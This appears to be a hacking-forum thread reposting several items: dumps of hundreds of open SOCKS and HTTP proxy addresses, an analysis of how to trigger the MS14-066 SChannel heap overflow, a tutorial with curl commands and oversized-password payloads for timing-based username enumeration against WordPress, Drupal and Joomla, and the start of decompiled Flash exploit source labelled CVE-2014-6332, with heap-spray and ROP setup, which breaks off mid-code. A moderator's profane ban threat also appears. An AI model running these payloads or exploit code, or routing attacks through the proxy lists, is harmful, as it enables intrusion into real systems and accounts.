Nytro

[h=1]22-11-14 | VIP Socks 5 (62)[/h] 22-11-14 | VIP Socks 5 (62) Checked & filtered 1.123.173.67:19065 104.11.133.164:44049 104.139.100.123:42420 104.4.83.73:36221 107.9.49.108:51259 108.24.82.162:35365 109.154.200.72:15052 173.21.14.244:16191 173.245.239.242:59477 173.48.85.6:46660 174.107.164.196:26849 174.116.239.240:35630 176.63.119.172:40136 184.155.143.249:42637 184.68.38.126:50901 198.27.67.24:53050 198.27.67.24:53193 198.50.206.1:443 199.182.225.70:25512 203.110.141.106:52511 203.45.178.175:49437 216.240.53.99:43800 217.66.27.149:7011 23.255.237.44:27588 24.144.145.125:44998 24.154.218.133:33290 24.168.43.58:36072 24.2.214.169:54442 24.229.64.217:5279 24.45.4.130:16063 24.7.95.31:30803 24.93.123.61:2699 31.15.217.3:33078 37.159.220.241:46767 37.57.97.96:24083 61.147.67.2:9125 64.18.119.226:20159 64.229.172.61:19873 66.112.33.144:45581 66.250.241.36:5112 67.58.83.247:39264 69.147.252.172:443 69.76.173.69:30631 70.173.40.165:19102 70.175.230.124:47067 70.184.92.175:25837 71.74.145.212:48814 74.101.164.248:19337 74.194.2.93:15782 74.84.255.109:32936 76.12.56.108:1028 76.180.122.136:29744 78.39.178.2:443 85.222.111.125:22167 90.200.112.137:25859 91.246.235.157:16122 92.245.196.43:5165 96.241.56.92:52074 96.36.39.162:17632 98.193.56.63:28778 98.222.86.109:42368 98.243.193.64:46547 Sursa: 22-11-14 | VIP Socks 5 (62) - Pastebin.com

22-11-14 | L1 High Anonymous Proxies (940) 22-11-14 | L1 High Anonymous Proxies (940) Checked & filtered 123.110.82.126:8088 117.147.246.90:8123 112.18.164.85:8123 182.93.236.22:8080 183.228.197.222:8123 202.114.6.37:9001 180.213.2.154:1337 112.111.114.51:9000 182.234.146.247:8088 111.10.88.235:8123 112.18.186.108:8123 218.207.28.154:8123 119.142.80.95:8585 117.173.18.95:8123 183.222.73.19:8123 111.10.155.212:8123 183.222.182.184:8123 117.176.2.125:8123 223.64.100.118:8123 183.220.198.198:8123 117.175.116.33:8123 223.18.236.163:8088 183.220.235.66:8123 183.228.196.126:8123 183.228.100.129:8123 183.249.20.60:8123 117.174.200.212:8123 183.221.186.212:8123 223.86.208.179:8123 203.172.213.246:8080 130.79.89.237:21320 111.10.101.22:8123 219.68.213.84:8088 183.220.239.167:8123 60.207.63.123:8118 117.176.191.15:8123 112.1.165.17:8123 203.172.222.230:8080 223.86.65.83:8123 1.192.62.103:8585 113.255.41.74:8088 111.9.87.226:8123 183.222.156.80:8123 111.1.3.38:8000 117.175.117.48:8123 183.223.201.147:8123 183.249.52.152:8123 117.139.35.74:8123 111.10.94.186:8123 182.235.37.111:8088 223.85.98.64:8123 183.222.152.160:8123 121.14.138.56:81 223.85.16.92:8123 183.222.172.117:8123 183.223.32.186:8123 219.239.236.49:9999 117.177.44.226:8123 223.85.18.54:8123 123.192.178.150:8088 115.28.85.240:8088 183.222.156.76:8123 117.176.188.152:8123 1.175.48.82:8088 117.173.20.43:8123 120.199.246.0:8123 203.172.209.246:8080 183.222.154.60:8123 223.86.100.43:8123 112.18.92.75:8123 183.223.168.236:8123 117.176.189.40:8123 221.225.117.192:8088 117.176.27.184:8123 1.198.227.78:9000 223.86.14.241:8123 223.86.221.25:8123 222.166.102.139:8088 183.228.36.236:8123 111.10.145.19:8123 223.64.54.95:8123 111.10.130.249:8123 221.178.21.163:8123 117.173.22.10:8123 183.222.157.209:8123 223.86.203.43:8123 223.86.135.250:8123 114.255.183.163:8080 221.178.117.213:8123 223.86.137.155:8123 183.221.217.249:8123 223.85.23.91:8123 203.172.242.190:8080 117.27.157.111:8081 59.148.110.23:8088 117.175.111.110:8123 49.158.118.219:8088 111.10.145.165:8123 183.228.39.207:8123 183.228.238.106:8123 111.10.103.63:8123 119.246.32.164:8088 223.85.81.183:8123 183.222.152.205:8123 111.10.146.230:8123 183.223.169.195:8123 61.15.192.245:8088 223.87.75.190:8123 140.116.91.199:8088 203.172.227.45:8080 221.178.31.243:8123 111.13.55.3:22 183.221.217.130:8123 221.178.23.42:8123 61.191.27.118:1818 116.228.80.186:8080 123.101.201.123:9000 183.228.111.122:8123 59.162.204.150:8080 203.172.203.6:8080 119.80.183.2:8080 114.27.130.117:8088 117.175.101.134:8088 117.174.193.162:8123 183.228.249.182:8123 62.117.58.109:6588 112.18.166.102:8123 85.234.20.131:3128 94.232.9.242:8080 117.175.227.55:8123 183.228.41.136:8123 223.86.223.222:8123 117.175.215.199:8123 183.228.239.56:8123 183.220.244.101:8123 183.228.43.226:8123 183.219.14.137:8123 117.173.22.98:8123 183.223.157.204:8123 211.139.80.180:8080 221.10.40.237:82 122.88.143.151:8123 183.220.154.216:8123 117.176.38.48:8123 115.28.229.8:8088 111.10.131.7:8123 203.172.211.182:8080 223.85.16.104:8123 61.93.246.50:8080 220.132.129.3:8088 117.173.23.22:8123 112.18.0.101:8123 117.173.23.46:8123 183.228.89.217:8123 218.23.185.19:8080 212.42.116.148:8080 112.18.167.177:8123 123.101.201.116:9000 183.222.154.93:8123 117.175.242.116:8123 221.178.22.165:8123 223.86.65.218:8123 140.115.202.134:8088 223.86.219.3:8123 183.220.46.236:8123 111.10.191.68:8123 112.18.196.247:8123 183.228.122.229:8123 117.177.172.176:8123 117.175.118.97:8123 223.86.4.41:8123 117.175.241.120:8123 112.22.8.174:8123 182.234.152.129:8088 183.222.64.143:8123 221.178.25.156:8123 223.86.221.65:8123 111.10.166.154:8123 61.185.32.21:63000 111.10.97.200:8123 182.93.224.14:8080 117.175.241.98:8123 111.10.39.65:8123 111.9.233.17:8123 183.223.35.39:8123 203.172.211.70:8080 112.18.176.217:8123 183.223.242.172:8123 223.86.216.45:8123 112.21.232.176:8123 112.15.99.191:8123 183.228.182.157:8123 118.166.124.129:8088 221.178.23.254:8123 223.86.134.250:8123 117.139.35.231:8123 117.174.214.192:8123 117.176.162.104:8123 115.28.11.165:8888 117.172.77.57:8123 73.152.24.102:80 183.209.236.253:8123 221.178.66.31:8123 183.223.200.142:8123 183.220.245.134:8123 183.224.99.149:8123 183.221.55.66:8123 111.243.68.137:8088 123.110.46.159:8088 183.228.151.130:8123 223.86.101.162:8123 223.85.20.11:8123 183.223.192.172:8123 171.12.1.71:81 111.185.131.85:8088 183.222.74.19:8123 117.175.39.91:8123 183.222.72.156:8123 123.101.201.6:9000 223.64.100.36:8123 223.85.21.65:8123 218.28.74.30:63000 117.139.39.98:8123 183.228.148.62:8123 218.207.11.60:8123 183.223.211.126:8123 123.195.26.231:8088 223.87.77.100:8123 183.222.155.111:8123 221.178.20.8:8123 223.85.97.240:8123 120.199.255.129:8123 223.85.23.64:8123 61.155.169.11:808 183.223.192.125:8123 123.241.50.79:8088 120.199.240.70:8123 183.228.40.127:8123 119.14.58.241:8088 203.171.227.38:8888 117.173.21.221:8123 117.139.29.47:8123 111.9.170.249:8123 112.18.168.179:8123 117.175.192.93:8123 183.222.152.110:8123 223.85.22.98:8123 112.44.234.168:8123 183.223.197.108:8123 123.195.35.100:8088 113.200.220.242:8123 223.87.114.74:8123 60.244.39.225:8088 112.44.230.216:8123 223.86.208.132:8123 114.32.219.221:8088 115.29.249.17:9000 183.222.246.137:8123 61.10.141.128:8088 112.16.78.194:8080 117.176.184.108:8123 183.227.211.79:8123 223.86.223.79:8123 140.206.86.70:8080 183.228.40.108:8123 183.228.141.4:8123 183.223.18.181:8123 221.10.40.238:82 77.70.29.176:81 218.244.138.253:808 221.178.31.130:8123 221.178.77.33:8123 112.18.194.31:8123 117.176.191.199:8123 177.223.228.1:9064 221.178.32.91:8123 140.116.101.93:8088 223.86.3.103:8123 112.18.79.182:8123 111.3.71.108:8123 182.93.241.230:8080 82.146.44.46:8080 117.173.204.147:8123 183.222.82.32:8123 222.220.187.51:8585 223.85.76.105:8123 119.246.126.158:8088 223.86.216.56:8123 183.223.155.74:8123 183.223.32.135:8123 219.153.56.22:8080 203.100.80.81:8080 123.202.145.36:8088 223.86.7.137:8123 117.174.200.120:8123 117.173.232.220:8123 117.176.189.195:8123 203.149.30.82:80 183.223.21.24:8123 221.178.99.51:8123 117.139.34.33:8123 61.177.137.131:63000 223.85.97.171:8123 186.101.75.82:3128 111.10.119.100:8123 111.10.155.184:8123 223.85.100.160:8123 119.77.134.182:8088 183.136.221.6:3128 210.214.27.200:8080 223.86.102.57:8123 171.12.2.131:81 111.184.187.181:8088 49.158.21.212:8088 117.174.197.214:8123 111.10.44.85:8123 117.173.23.28:8123 69.10.137.139:8000 61.182.94.242:63000 183.223.10.174:8123 183.223.35.4:8123 221.10.102.199:843 218.207.11.52:8123 111.10.137.176:8123 111.10.103.175:8123 183.223.195.179:8123 190.200.17.40:21320 183.220.46.85:8123 182.93.218.30:8080 183.228.37.218:8123 111.10.133.203:8123 14.139.111.91:3128 183.228.201.236:8123 222.22.93.252:8088 183.220.245.83:8123 223.86.67.85:8123 173.201.183.172:8000 203.172.222.214:8080 221.178.98.48:8123 60.206.153.177:8118 183.228.192.141:8123 223.85.60.202:8123 111.10.164.159:8123 223.86.216.106:8123 183.223.13.19:8123 117.139.38.32:8123 121.232.13.61:8088 223.86.41.252:8123 183.223.200.77:8123 183.223.153.210:8123 183.222.153.86:8123 202.79.36.119:8080 183.220.247.200:8123 183.222.82.148:8123 210.27.237.111:8088 183.222.178.224:8123 223.86.75.224:8123 183.228.220.58:8123 111.10.158.182:8123 117.173.121.148:8123 112.44.230.36:8123 202.143.154.102:8080 183.227.253.10:8123 161.6.45.63:21320 117.173.245.203:8123 183.222.255.136:8123 223.86.44.133:8123 117.173.18.109:8123 120.199.243.29:8123 117.176.187.81:8123 218.164.150.7:8088 180.153.32.11:8080 183.223.153.13:8123 183.228.243.72:8123 112.18.176.241:8123 118.169.162.252:8088 114.24.110.5:8088 112.18.170.158:8123 111.10.49.255:8123 183.228.138.61:8123 117.172.151.57:8123 223.86.115.53:8123 218.207.12.119:8123 223.87.113.98:8123 183.228.180.247:8123 111.9.234.123:8123 60.26.60.194:8118 223.85.85.2:8123 117.173.240.220:8123 183.228.183.79:8123 223.86.46.182:8123 183.227.209.52:8123 183.222.73.52:8123 221.178.53.138:8123 120.193.60.135:8123 123.193.221.132:8088 183.220.46.113:8123 183.223.198.195:8123 117.173.62.213:8123 117.173.121.254:8123 60.195.3.180:8118 223.85.97.96:8123 183.222.182.36:8123 218.207.208.55:8080 183.223.192.189:8123 114.40.89.234:8088 59.67.83.68:8088 223.85.83.113:8123 112.18.153.221:8123 117.173.21.14:8123 183.228.242.201:8123 117.174.195.3:8123 112.0.104.138:8123 112.0.30.84:8123 117.175.229.239:8123 183.223.21.138:8123 223.85.95.34:8123 123.101.200.185:9000 223.87.190.96:8123 117.173.20.19:8123 202.143.160.193:8080 223.85.19.121:8123 112.44.238.80:8123 113.200.220.39:8123 117.139.28.18:8123 117.174.198.230:8123 223.86.127.178:8123 111.10.155.120:8123 183.228.79.166:8123 117.173.121.177:8123 117.174.196.5:8123 223.85.21.195:8123 111.10.149.20:8123 223.86.127.126:8123 117.173.20.60:8123 183.220.45.35:8123 221.178.54.70:8123 183.222.152.142:8123 117.175.103.247:8123 42.62.24.87:8085 111.10.44.133:8123 183.223.166.13:8123 221.178.55.45:8123 112.18.161.100:8123 111.2.241.208:8123 1.193.52.246:8118 183.223.11.116:8123 85.90.222.240:12345 111.4.120.140:8123 223.87.184.97:8123 183.221.147.191:8123 111.10.155.106:8123 123.203.56.220:8088 117.173.205.160:8123 186.94.214.35:3128 91.185.110.162:21320 117.174.208.172:8123 221.178.80.217:8123 111.10.100.155:8123 112.18.160.141:8123 123.163.124.30:9000 114.38.197.137:8088 117.176.105.176:8123 183.222.172.192:8123 115.29.247.115:8888 183.223.40.63:8123 223.87.190.118:8123 188.2.107.92:21320 222.88.236.236:81 223.85.97.8:8123 112.11.48.4:8088 182.234.251.104:8088 221.10.102.203:82 117.172.78.48:8123 183.223.168.89:8123 221.178.30.190:8123 223.85.96.47:8123 182.93.236.6:8080 223.86.99.57:8123 223.86.223.40:8123 125.71.212.25:9000 223.85.98.166:8123 117.63.0.60:8118 218.95.158.99:63000 49.159.14.176:8088 1.194.8.245:808 123.193.199.41:8088 183.228.72.54:8123 60.206.239.195:8118 112.20.116.103:8123 202.103.150.70:8088 58.115.101.4:8088 112.15.33.108:8123 223.64.100.23:8123 114.255.183.173:8080 117.173.20.230:8123 117.173.242.166:8123 123.101.200.209:9000 223.86.216.249:8123 183.220.244.201:8123 118.161.57.99:8088 112.18.176.138:8123 58.195.5.30:8088 60.191.139.18:9000 183.220.155.167:8123 112.22.252.69:8123 182.93.218.86:8080 183.223.166.223:8123 61.244.4.96:8088 112.3.166.142:8123 111.10.86.249:8123 180.153.32.9:8080 112.22.228.193:8123 223.86.210.46:8123 223.87.114.181:8123 117.175.239.23:8123 112.21.237.134:8123 183.223.20.153:8123 112.18.64.130:8123 223.85.17.108:8123 62.75.229.121:3128 221.178.117.187:8123 223.64.225.78:8123 112.44.245.141:8123 223.86.212.188:8123 183.222.153.130:8123 183.209.110.179:8123 1.170.20.142:8088 221.182.62.30:8123 180.177.194.95:8088 180.102.32.92:8118 111.10.101.185:8123 112.18.92.197:8123 183.222.182.26:8123 223.85.80.160:8123 183.228.246.55:8123 223.85.98.141:8123 183.228.241.174:8123 223.87.190.199:8123 111.10.163.178:8123 117.173.83.111:8123 183.222.155.56:8123 14.136.3.205:8088 218.252.119.131:8088 117.174.201.3:8123 117.173.22.221:8123 112.18.176.26:8123 183.230.53.78:8123 69.64.32.110:12183 183.222.155.175:8123 91.241.18.129:3129 183.228.181.58:8123 112.44.231.164:8123 183.220.247.113:8123 112.111.114.137:9000 112.18.69.249:8123 223.86.221.246:8123 60.166.19.218:63000 111.2.240.145:8123 112.18.194.217:8123 223.85.21.217:8123 112.18.162.147:8123 183.228.89.167:8123 203.172.209.190:8080 117.175.33.9:8123 218.108.168.70:82 106.0.144.6:8080 183.222.158.239:8123 183.222.173.157:8123 111.10.28.146:8123 203.172.216.126:8080 118.122.114.249:9000 183.222.156.225:8123 221.178.75.230:8123 221.182.73.193:8123 183.228.211.133:8123 221.178.31.29:8123 113.164.0.241:8080 183.222.255.183:8123 123.163.120.43:9000 202.77.138.35:8080 111.10.58.82:8123 121.52.229.51:3128 122.88.141.56:8123 202.92.173.189:8088 183.223.166.147:8123 183.228.106.15:8123 111.10.87.91:8123 117.176.184.87:8123 119.14.75.73:8088 112.18.178.43:8123 117.174.192.95:8123 203.172.149.3:8080 123.163.124.29:9000 211.77.5.41:8081 183.245.210.13:8123 117.148.38.134:8123 122.88.169.121:8123 117.139.66.218:8123 223.86.209.94:8123 70.99.146.246:7004 111.10.49.38:8123 111.10.180.195:8123 177.234.12.202:3128 117.173.20.218:8123 183.208.39.173:8123 112.44.245.149:8123 183.221.160.83:8123 112.18.170.143:8123 183.228.183.225:8123 183.220.196.94:8123 117.173.22.139:8123 117.173.254.168:8123 183.222.252.159:8123 117.176.191.178:8123 111.10.100.182:8123 112.22.16.114:8123 117.175.35.89:8123 111.10.152.37:8123 203.172.216.6:8080 117.148.45.107:8123 211.155.86.245:8000 183.211.27.65:8123 117.173.57.179:8123 183.221.190.172:8123 211.143.146.239:82 213.135.234.6:81 60.210.111.42:8088 111.252.52.91:8088 183.223.159.170:8123 183.220.45.82:8123 59.148.166.55:8088 183.222.154.141:8123 117.173.120.85:8123 117.175.243.51:8123 196.201.216.170:8088 118.161.50.236:8088 117.147.221.157:8123 212.185.87.53:443 223.87.185.201:8123 111.10.119.3:8123 117.139.69.239:8123 183.220.168.42:8123 117.174.198.76:8123 117.174.200.220:8123 123.192.19.227:8088 111.250.170.135:8088 183.227.252.113:8123 218.35.182.54:8088 117.173.22.111:8123 218.207.16.238:8123 183.220.246.125:8123 220.134.40.139:8088 122.88.87.34:8123 58.251.78.71:8088 123.163.120.52:9000 111.39.172.53:8088 218.7.132.1:8080 183.223.172.81:8123 221.178.116.167:8123 111.20.177.46:8123 140.114.226.109:8088 111.10.13.255:8123 140.114.212.169:8088 117.173.102.45:8123 183.223.21.71:8123 183.228.43.155:8123 223.87.184.120:8123 183.228.88.2:8123 117.173.204.186:8123 98.211.196.247:3128 223.85.99.203:8123 117.177.173.119:8123 221.182.62.32:8123 221.178.78.9:8123 223.87.108.92:8123 223.85.23.231:8123 221.182.75.210:8123 222.205.127.250:8080 117.175.194.66:8123 202.143.168.150:8080 112.18.165.152:8123 83.219.21.28:8080 112.3.202.182:8123 39.187.49.24:8123 183.209.236.149:8123 183.221.189.89:8123 140.114.207.85:8088 111.9.110.248:8123 183.222.154.114:8123 183.220.246.223:8123 117.175.118.37:8123 223.64.100.24:8123 183.223.196.201:8123 14.136.61.100:8088 119.97.164.48:8085 203.172.222.38:8080 111.10.100.46:8123 183.223.193.50:8123 117.177.174.142:8123 183.221.160.58:8123 202.105.247.122:9999 111.9.87.119:8123 117.176.109.57:8123 221.178.119.225:8123 140.114.216.105:8088 112.18.159.243:8123 221.178.86.25:8123 183.222.86.3:8123 218.14.121.227:9000 183.222.172.196:8123 111.10.97.246:8123 117.176.28.70:8123 219.68.160.90:8088 203.71.152.152:8088 210.43.139.105:8088 111.10.194.219:8123 122.88.215.160:8123 159.226.170.79:8080 183.220.196.58:8123 223.86.119.141:8123 203.172.248.198:8080 115.236.59.194:3128 221.178.122.31:8123 1.175.38.181:8088 1.172.25.3:8088 120.199.226.69:8123 117.173.62.226:8123 117.172.77.182:8123 71.230.131.198:3128 183.220.45.65:8123 183.228.78.93:8123 111.9.174.86:8123 182.234.147.27:8088 117.21.192.8:80 111.10.152.34:8123 117.190.76.46:8088 183.223.204.76:8123 112.15.15.158:8123 183.222.172.77:8123 112.111.114.204:9000 223.86.33.71:8123 180.176.131.157:8088 183.228.209.97:8123 109.197.55.7:3128 117.173.21.190:8123 183.228.234.78:8123 223.86.171.178:8123 27.207.69.232:8088 183.208.34.149:8123 140.206.86.68:8080 113.255.46.78:8088 115.43.229.26:8088 117.173.120.232:8123 183.222.152.219:8123 59.124.1.140:8088 119.236.248.42:8088 112.111.114.72:9000 123.203.77.101:8088 112.112.11.82:8080 223.86.4.207:8123 183.222.155.26:8123 221.178.119.207:8123 183.220.46.211:8123 140.116.132.20:8088 221.178.54.183:8123 112.23.249.200:8123 223.64.127.153:8123 124.11.67.64:8088 183.223.168.159:8123 39.189.100.228:8123 183.222.155.149:8123 112.18.161.122:8123 183.220.161.103:8123 222.167.62.122:8088 113.252.202.126:8088 61.187.249.231:63000 183.223.195.106:8123 183.220.46.97:8123 117.148.47.88:8123 183.221.190.222:8123 117.175.103.228:8123 221.178.96.34:8123 123.194.126.60:8088 223.86.6.181:8123 117.175.36.81:8123 221.224.163.37:9000 117.175.109.112:8123 123.163.120.50:9000 183.228.89.229:8123 42.121.105.155:8888 222.45.100.3:8080 223.86.115.154:8123 183.227.218.154:8123 183.221.217.49:8123 117.174.196.202:8123 117.175.242.222:8123 223.18.251.38:8088 221.178.14.227:8123 111.3.109.130:8123 221.10.40.236:81 58.215.212.243:63000 183.223.194.165:8123 223.86.32.119:8123 183.223.213.205:8123 183.223.242.113:8123 182.93.236.38:8080 111.10.89.189:8123 117.10.244.241:8118 111.10.186.68:8123 125.220.10.125:8088 117.175.213.161:8123 183.228.200.140:8123 211.80.41.192:8088 223.87.76.232:8123 182.93.237.22:8080 111.2.240.170:8123 61.228.25.82:8088 183.222.101.130:8123 183.228.219.244:8123 183.228.242.153:8123 183.221.187.64:8123 117.175.36.150:8123 1.202.15.102:63000 183.245.231.190:8123 218.104.239.12:8118 183.228.193.254:8123 223.86.113.46:8123 221.178.86.204:8123 58.115.139.29:8088 117.139.65.248:8123 212.175.17.237:8080 218.207.53.196:8123 117.175.229.240:8123 123.0.254.83:8088 58.51.197.19:63000 202.115.28.113:808 223.85.98.118:8123 223.87.117.18:8123 111.10.163.97:8123 183.228.181.242:8123 115.154.225.119:8585 183.221.188.121:8123 221.178.83.79:8123 111.184.183.144:8088 112.18.160.251:8123 183.222.173.17:8123 117.175.34.232:8123 111.10.193.29:8123 117.136.166.151:8123 223.86.99.185:8123 118.26.230.75:8080 183.222.158.145:8123 119.6.136.126:82 221.178.20.249:8123 117.173.60.93:8123 118.81.149.200:8088 183.228.72.185:8123 223.86.101.25:8123 223.85.18.23:8123 117.175.124.105:8123 118.194.196.12:8080 116.228.55.217:8003 117.176.1.84:8123 183.222.173.234:8123 223.86.9.193:8123 123.203.96.106:8088 61.57.125.101:8088 117.177.173.131:8123 223.85.99.88:8123 111.10.102.242:8123 221.178.14.231:8123 117.176.162.153:8123 117.173.62.221:8123 112.24.115.214:8123 203.172.233.109:8080 114.43.20.199:8088 203.172.209.49:8080 183.220.46.25:8123 218.35.144.218:8088 119.6.144.70:843 111.10.195.229:8123 182.234.73.217:8088 137.135.166.225:8118 61.155.11.39:9999 219.68.190.87:8088 123.101.194.69:9000 111.10.98.195:8123 183.222.158.92:8123 210.212.245.236:8080 218.207.28.185:8123 111.185.178.5:8088 111.10.138.75:8123 183.228.235.214:8123 202.102.201.99:8080 123.163.120.35:9000 182.93.229.66:8080 182.93.235.118:8080 203.172.149.155:8080 111.10.100.35:8123 211.77.5.38:8081 58.118.216.201:8088 221.178.30.238:8123 223.87.190.26:8123 183.228.103.50:8123 117.175.228.9:8123 124.12.87.119:8088 183.228.78.4:8123 223.86.217.123:8123 112.44.252.46:8123 218.207.17.82:8123 183.220.228.19:8123 223.85.60.74:8123 183.221.160.243:8123 117.175.116.78:8123 223.85.20.254:8123 80.232.255.197:21320 183.222.159.114:8123 117.173.81.168:8123 111.3.78.103:8123 121.55.204.80:8088 183.228.39.8:8123 183.223.12.202:8123 111.10.194.100:8123 223.86.101.160:8123 117.177.166.246:8123 221.178.65.197:8123 223.85.21.235:8123 5.9.70.75:8118 112.15.64.133:8123 182.118.3.228:8888 223.86.117.33:8123 171.12.2.133:81 183.228.232.72:8123 182.93.218.78:8080 221.178.21.198:8123 58.199.150.21:8585 221.215.150.116:8080 117.149.253.1:8123 183.223.203.141:8123 Sursa: 22-11-14 | L1 High Anonymous Proxies (940) - Pastebin.com

[h=3]MS14-066 In Depth Analysis[/h] A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; However, a few hours research fixed that. BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow. [h=2]DecodeSigAndReverse[/h] We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified. The first thing that is done here is the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (LocalAlloc Wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient. CryptDecodeObject is now called again, but this time it is passed a pointer to the allocate memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left. The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size an looks something like this. What R and S are doesn't really matter here, all we need to know is they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored. The 2 memcpy operations should be pretty obvious now, the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R; If there's going to be an overflow It's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated. All I had to do to find where the memory gets allocated was to look at the call graph, find the function responsible for coding DecodeSigAndReverse, then scout it for the "Dst" parameter. This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... Drum roll please.... get the key length. Directly below that length is being divided by 8 (converted from bits to bytes) then doubled; this is due to the fact the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap. So back at the 2 memcpys now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bit (32 bytes), then the function is expecting a 512 bit (64 byte) signature, any more will overflow the heap and when it's freed cause a crash. There are very few constraints on the signature, due to the fact the whole thing is just 2 massive integers. As long as we maintain a valid ASN.1 (DER) encoding and the signature is of valid size, we can write arbitrary data to the heap header resulting in an access violation or even remote code execution when the system tries to free the memory. Posted by TM at 11:19 AM Sursa: MS14-066 In Depth Analysis - MalwareTech

Numai posturi de-aa-pulea. La urmatorul ai ban permanent.

Timing Attacks in Web Applications When code is executed by a machine it takes some time to do so. Execution time ranges from nanoseconds to months and years and even more (think bruteforcing). Web applications construct output producing, in most cases, very short delays (think the time it takes to show Google search results after typing in the query). Depending on what output is request, how it is requested and what the input is web applications can vary their execution time. In this article we’re going to exploit some of the open-source content management systems available using delays in its execution under differing conditions to evoke distinct differences in execution time, which allow us, as attackers, to make some useful conclusions. WordPress You should know what WordPress is. It’s only the most popular content management system at the moment, and the slickest one, too. wp-includes/user.php is the code that we shall be attempting to exploit. This code handles user authentication in WordPress. Take your time to go through the function code. You can immediately see early return conditions. When username is not found and error is returned. If a username is existent – the password is hashed and checked against the valid password hash for the user. So, hashing the input password is work that does not happen if a username does not exist. And hashing is an expensive operation relative to everything else, so potentially a difference in time should be noticed. Armed with cURL we do: time curl --data "log=noexist&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.599s user 0m0.012s sys 0m0.000s time curl --data "log=admin&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.566s user 0m0.000s sys 0m0.012s Having done this a couple of times you’ll notice no difference. Due to fluctuating network latency and other factors the results are in no way conclusive. So let’s prepare a larger password to hash to make WordPress huff and puff a bit. echo -n "log=noexist&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload ~500 kilos worth of password characters to hash, eek. time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null real 0m0.511s user 0m0.012s sys 0m0.032s echo -n "log=admin&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null real 0m29.803s user 0m0.012s sys 0m0.036s See? This is, of course, very far from useful in the context of WordPress, since WordPress is kind enough to give out different error messages depending on whether a user exists or not. ERROR: The password you entered for the username admin is incorrect. vs. ERROR: Invalid username. The same cannot be said for other applications. Drupal Authentication in Drupal is handled by the user module, found in modules/user/user.module. Take a peek at the user_login_authenticate_validate function. See the branch that allows some extra work? if ($account) { .... The principal is the same. However, short passwords so make Drupal work noticeably enough. time curl --data "name=noexist&pass=123&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null real 0m0.593s user 0m0.012s sys 0m0.028s time curl --data "name=admin&pass=not_real&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null real 0m1.181s user 0m0.012s sys 0m0.028s So no need to assemble large payloads. Thanks, Drupal. Joomla! The more convoluted Joomla authentication routine is stowed away in plugins/authentication/joomla/joomla.php, onUserAuthenticate. Take a moment to look at it. The scenario is completely the same, if ($result) { ... does extra work if user exists and $testcrypt = JUserHelper::getCryptedPassword($credentials['password'], $salt); will do some work if user exists, theoretically. The difficulty here is that by default Joomla uses md5 hashing, which is relatively lightweight and very fast. Joomla doesn’t really mind hashing 10MB password payloads and is not susceptible to such attacks in md5 mode. Yet, once it’s in any of the other available hashing modes timing attacks to check username validity are possible. Conclusion Do you know of any other popular web applications that are predisposed to any form of timing attacks? Sursa: Timing Attacks in Web Applications

[h=1]Exploit.SWF.CVE-2014-6332[/h]By: physicaldrive0 on Nov 21st, 2014 *** PhysicalDrive0 *** package mx.core { public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal"; }//package mx.core ?package mx.core { public interface IFlexAsset { } }//package mx.core ?package mx.core { import flash.utils.*; public class ByteArrayAsset extends ByteArray implements IFlexAsset { mx_internal static const VERSION:String = "4.6.0.23201"; } }//package mx.core ?package { import mx.core.*; public class flappyMan_keyClass extends ByteArrayAsset { } }//package ?package { import flash.events.*; import flash.utils.*; import flash.display.*; import flash.media.*; import __AS3__.vec.*; import flash.net.*; import flash.external.*; public class flappyMan extends MovieClip { public var keyClass:Class; private var btaObj:ByteArray; private var outObj:theoutobj; private var sndObj:Sound; public var vtObj20W:Vector.<Object>; public var vtObj1H:Vector.<Object>; public var vtObj20WLen:int = 1022; public var vtObj1HLen:int = 1007; private var workTimerExploit:Timer; private var bGoNextStep:Boolean = false; private var bExploited:Boolean = false; private var infectedObjIndex:int = 0; private var changedPropertyObjIndex:int = 0; private var iLoopCount:int = 0; private var controlledAddr:uint = 0; private var heapSprayObjAddr:uint = 0x1E140000; private var fakeEnvcoreObjAddr:uint; private var offset:int = 0; private var iCountOffset:int = 184; private var stackMemoryStructAddr:int = 0; private var flagNumber:uint = 3735928545; private var flagSavePosition:int = 176; private var ropChainLen:int = 0; private var uiNopValue:uint = 0; private var recObjAddr:uint = 0; private var _MaxCountPos:uint = 0; private var heapSprayLenByEnv20W:int = 98688; private var storedObjIndex:int = 0; public var fModuleAddrStart:int = 0; public var fModuleAddrEnd:int = 0; private var code:String = ""; private var stopCode:String = ""; private var jpgBytes:ByteArray; private var jpgLoader:URLLoader; private var floatString:String = ""; public function flappyMan(){ this.keyClass = flappyMan_keyClass; this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100); this.stackMemoryStructAddr = 